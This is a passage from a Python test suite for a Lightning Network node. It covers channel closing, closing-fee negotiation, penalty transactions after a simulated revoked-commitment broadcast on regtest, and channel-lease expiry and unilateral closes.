+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
mine_funding_to_announce(bitcoind, [l1, l2, l3, l4])
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spent the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check the another address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
# v22.99.0-8fe6f5a6fbcd at least doesn't have 'fee', it has 'fees'.
if 'fees' in mempool[close_tx_id]:
fee_mempool = round(mempool[close_tx_id]['fees']['base'] * 10**8)
else:
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'dev-disable-commit-after': 1,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 1,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an outgoing HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# First we need to get funds to l2, so suppress after second.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'dev-disable-commit-after': 3,
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'dev-disable-commit-after': 3,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('dev-disable-commit-after: disabling')
assert not l2.daemon.is_in_log('dev-disable-commit-after: disabling')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
assert set([o['txid'] for o in outputs]) == txids
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# l1 loses all of their channel balance to the peer, as penalties
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
}
# l2 sweeps all of l1's closing outputs
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_falls_behind(node_factory, bitcoind):
'''
If our peer falls too far behind/doesn't send us an update for
their blockheight, the lessor fails the channel
'''
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# sink the funding transaction
bitcoind.generate_block(1, wait_for_mempool=1)
# stop l1
l1.stop()
# advance blockchain 1008 blocks, the lessor should drop to chain
bitcoind.generate_block(1008)
sync_blockheight(bitcoind, [l2])
l2.daemon.wait_for_log('Offline peer is too far behind, terminating')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.developer("requres 'dev-queryrates'")
@pytest.mark.slow_test
def test_channel_lease_post_expiry(node_factory, bitcoind, chainparams):
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'plugin': coin_mvt_plugin}
l1, l2, = node_factory.get_nodes(2, opts=opts)
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
# l1 leases a channel from l2
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
channel_id = first_channel_id(l1, l2)
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
# l2 attempts to close a channel that it leased, should fail
with pytest.raises(RpcError, match=r'Peer leased this channel from us'):
l2.rpc.close(l1.get_channel_scid(l2))
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 115')
# We need to give l1-l2 time to update their blockheights
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(1000)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
bitcoind.generate_block(32)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_BLOCKHEIGHT')
# l1<->l2 mutual close should work
chan = l1.get_channel_scid(l2)
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.rpc.close(chan)
l2.daemon.wait_for_log('State changed from CLOSINGD_SIGEXCHANGE to CLOSINGD_COMPLETE')
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l1, l2])
l1.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
l2.daemon.wait_for_log('Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
channel_mvts_1 = [
{'type': 'chain_mvt', 'credit': 506432000, 'debit': 0, 'tags': ['channel_open', 'opener', 'leased']},
{'type': 'channel_mvt', 'credit': 0, 'debit': 6432000, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 0, 'debit': 10000, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 499990000, 'tags': ['channel_close']},
]
channel_mvts_2 = [
{'type': 'chain_mvt', 'credit': 500000000, 'debit': 0, 'tags': ['channel_open', 'leased']},
{'type': 'channel_mvt', 'credit': 6432000, 'debit': 0, 'tags': ['lease_fee'], 'fees': '0msat'},
{'type': 'channel_mvt', 'credit': 10000, 'debit': 0, 'tags': ['invoice'], 'fees': '0msat'},
{'type': 'chain_mvt', 'credit': 0, 'debit': 506442000, 'tags': ['channel_close']},
]
check_coin_moves(l1, channel_id, channel_mvts_1, chainparams)
check_coin_moves(l2, channel_id, channel_mvts_2, chainparams)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@pytest.mark.slow_test
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_unilat_closes(node_factory, bitcoind):
'''
Check that channel leases work
l1-l2: l1 leases funds from l2; l1 goes to chain unilaterally
l2-l3: l2 leases funds from l3; l3 goes to chain unilaterally
'''
opts = {'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'funder-lease-requests-only': False}
l1, l2, l3 = node_factory.get_nodes(3, opts=opts)
# Allow l2 some warnings
l2.allow_warning = True
feerate = 2000
amount = 500000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l3.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
wait_for(lambda: len(l1.rpc.listpeers(l2.info['id'])['peers']) == 0)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
# l1 leases a channel from l2
l1.rpc.fundchannel(l2.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate),
compact_lease=rates['compact_lease'])
# l2 leases a channel from l3
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
rates = l2.rpc.dev_queryrates(l3.info['id'], amount, amount)
wait_for(lambda: len(l2.rpc.listpeers(l3.info['id'])['peers']) == 0)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.rpc.fundchannel(l3.info['id'], amount, request_amt=amount,
feerate='{}perkw'.format(feerate), minconf=0,
compact_lease=rates['compact_lease'])
est_fees = calc_lease_fee(amount, feerate, rates)
# This should be the accepter's amount
fundings = only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['funding']
assert Millisatoshi(est_fees + amount * 1000) == Millisatoshi(fundings['remote_msat'])
bitcoind.generate_block(6)
l1.daemon.wait_for_log('to CHANNELD_NORMAL')
l3.daemon.wait_for_log('to CHANNELD_NORMAL')
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(l1.get_channel_scid(l2))['channels']] == [True, True])
wait_for(lambda: [c['active'] for c in l3.rpc.listchannels(l3.get_channel_scid(l2))['channels']] == [True, True])
# send some payments, mine a block or two
inv = l2.rpc.invoice(10**4, '1', 'no_1')
l1.rpc.pay(inv['bolt11'])
inv = l2.rpc.invoice(10**4, '3', 'no_3')
l3.rpc.pay(inv['bolt11'])
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# make sure we're at the right place for the csv lock
l2.daemon.wait_for_log('Blockheight: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION LOCAL now 110')
l2.stop()
# unilateral close channels l1<->l2 & l3<->l2
l1.rpc.close(l2.info['id'], 1)
l3.rpc.close(l2.info['id'], 1, force_lease_closed=True)
# Wait til to_self_delay expires, l1 should claim to_local back
bitcoind.generate_block(10, wait_for_mempool=2)
l1.daemon.wait_for_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
bitcoind.generate_block(1, wait_for_mempool=1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal OUR_DELAYED_RETURN_TO_WALLET')
assert len(l1.rpc.listfunds()['outputs']) == 2
l2.start()
search_start = l2.daemon.logsearch_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 40.*')
utxo1 = re.match('.* adding utxo to watch (.*), csv .*', log).group(1)
l2.daemon.logsearch_start = search_start
log = l2.daemon.wait_for_log('adding utxo to watch .* csv 1')
utxo3 = re.match('.* adding utxo to watch (.*), csv 1', log).group(1)
# we *shouldn't* be able to spend it, there's a lock on it
with pytest.raises(RpcError, match='UTXO .* is csv locked'):
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# we *can* spend the 1csv lock one
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo3])
# This can timeout, so do it in four easy stages.
for i in range(4):
bitcoind.generate_block(4032 // 4)
sync_blockheight(bitcoind, [l2, l3])
l2.rpc.withdraw(l2.rpc.newaddr()['bech32'], "all", utxos=[utxo1])
# l3 cleans up their to-self after their lease expires
assert l3.daemon.is_in_log('Broadcasting OUR_DELAYED_RETURN_TO_WALLET')
@unittest.skipIf(TEST_NETWORK != 'regtest', 'elementsd doesnt yet support PSBT features we need')
@pytest.mark.openchannel('v2')
@unittest.skipIf(os.getenv('TEST_DB_PROVIDER', 'sqlite3') != 'sqlite3', "Makes use of the sqlite3 db")
@pytest.mark.developer("requres 'dev-queryrates'")
def test_channel_lease_lessor_cheat(node_factory, bitcoind, chainparams):
'''
Check that lessee can recover funds if lessor cheats
'''
balance_snaps = os.path.join(os.getcwd(), 'tests/plugins/balance_snaps.py')
opts = [{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_warning': True,
'plugin': balance_snaps},
{'funder-policy': 'match', 'funder-policy-mod': 100,
'lease-fee-base-sat': '100sat', 'lease-fee-basis': 100,
'may_reconnect': True, 'allow_broken_log': True,
'plugin': balance_snaps}]
l1, l2, = node_factory.get_nodes(2, opts=opts)
amount = 500000
feerate = 2000
l1.fundwallet(20000000)
l2.fundwallet(20000000)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
rates = l1.rpc.dev_queryrates(l2.info['id'], amount, amount)
